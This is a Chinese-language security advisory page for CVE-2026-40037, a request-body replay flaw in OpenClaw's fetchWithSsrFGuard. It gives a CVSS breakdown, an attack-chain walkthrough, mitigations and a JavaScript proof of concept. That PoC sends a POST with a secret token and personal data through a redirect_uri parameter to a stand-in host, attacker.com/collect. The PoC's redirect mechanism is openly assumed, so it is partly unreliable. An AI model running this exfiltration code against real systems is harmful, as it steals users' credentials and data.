CVE-2026-40037 CVSS 6.5 中危

CVE-2026-40037 OpenClaw请求体重放漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40037

漏洞类型

请求重放

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026年3月31日之前的版本中存在严重的请求体重放漏洞。该漏洞位于`fetchWithSsrFGuard`组件内部，由于对跨域重定向处理不当，允许攻击者将包含敏感信息的请求体重定向至第三方恶意源。攻击者通过精心构造的请求诱导用户交互，触发跨域重定向机制，从而成功窃取敏感的请求体数据或HTTP头部信息，造成严重的信息泄露风险。

技术细节

该漏洞的根本原因是OpenClaw的`fetchWithSsrFGuard`函数在处理跨域重定向时未能遵循安全最佳实践。在标准的Web安全架构中，当发生跨域重定向时，应当清除或限制敏感请求体的传输以防止数据泄露。然而，受影响版本在遇到跨域重定向（例如307或308状态码）时，错误地保留了原始的POST数据，并将其完整发送至重定向后的目标地址。攻击者利用此漏洞，首先诱导受害者向OpenClaw服务器发起包含敏感Payload（如API Token、用户PII等）的合法请求。随后，通过控制请求参数或利用服务器端逻辑触发重定向，导致该敏感请求被“重放”到攻击者预设的恶意服务器。由于该漏洞无需预先认证（PR:N）且仅需用户交互（UI:R），攻击门槛较低，极易被用于大规模的数据窃取活动。

攻击链分析

STEP 1

侦察

攻击者确认目标使用的是OpenClaw且版本低于2026.3.31，存在fetchWithSsrFGuard漏洞。

STEP 2

诱导

攻击者制作恶意网页或链接，诱导受害者点击访问，触发包含敏感数据的请求。

STEP 3

触发重定向

受害者浏览器向OpenClaw发起请求，攻击者利用漏洞参数诱导服务器将该请求跨域重定向至攻击者控制的服务器。

STEP 4

数据窃取

由于漏洞特性，原始请求中的敏感Body数据随重定向发送至攻击者服务器，完成数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-40037
 * Demonstrates request body replay via cross-origin redirect.
 * This script simulates a victim browser sending a request to the vulnerable OpenClaw endpoint.
 */

// Attacker controlled server to receive exfiltrated data
const attackerUrl = "https://attacker.com/collect";

// Vulnerable OpenClaw endpoint that uses fetchWithSsrFGuard
const vulnerableEndpoint = "https://vulnerable-openclaw.com/api/sync";

// Sensitive data that will be replayed
const sensitivePayload = {
    username: "admin",
    secret_token: "abc-123-secret-key",
    personal_info: "Confidential Data"
};

function exploit() {
    // Construct a URL that forces a redirect on the server side
    // Assuming the 'redirect_uri' parameter is used by the vulnerable function
    const exploitUrl = `${vulnerableEndpoint}?redirect_uri=${encodeURIComponent(attackerUrl)}`;

    fetch(exploitUrl, {
        method: "POST",
        headers: {
            "Content-Type": "application/json"
        },
        body: JSON.stringify(sensitivePayload),
        credentials: "include" // Include cookies if necessary
    })
    .then(response => {
        if (response.redirected) {
            console.log(`Request redirected to: ${response.url}`);
            console.log("Sensitive data potentially leaked to attacker.");
        }
    })
    .catch(error => console.error("Exploit failed:", error));
}

// Execute exploit
exploit();

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

在未升级补丁前，应禁用受影响组件中的跨域重定向功能，或在重定向逻辑中强制清空请求体和敏感头信息，防止数据泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表